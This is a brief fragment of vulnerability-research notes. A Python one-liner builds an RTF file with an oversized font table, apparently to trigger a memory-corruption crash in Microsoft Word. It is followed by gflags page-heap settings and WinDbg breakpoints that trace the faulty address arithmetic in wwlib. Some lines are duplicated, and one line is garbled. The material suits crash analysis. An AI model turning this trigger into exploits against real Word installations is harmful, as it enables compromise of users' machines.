open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl"+"".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
importsys
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl"+"".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
gflags.exe /p /enable winword.exe /full
gflags.exe /p /enable winword.exe /full
bp wwlib+2F00A8".printf \" Cum: %p Font id: %p Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", eax,ecx,(esi+eax*2+4),esi,eax; gc"
bp wwlib+2F00CB".printf \" Base: %p \\n \", poi(esi+2); gc"
bp wwlib+2F00CF".printf \" Edx: %p from 0x%x + 0x%x*2\\n \", (ecx + edx*2),ecx,edx; gc"
bp wwlib+2F00D5".printf \" Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", (esi+edx*2+4),esi,edx; gc"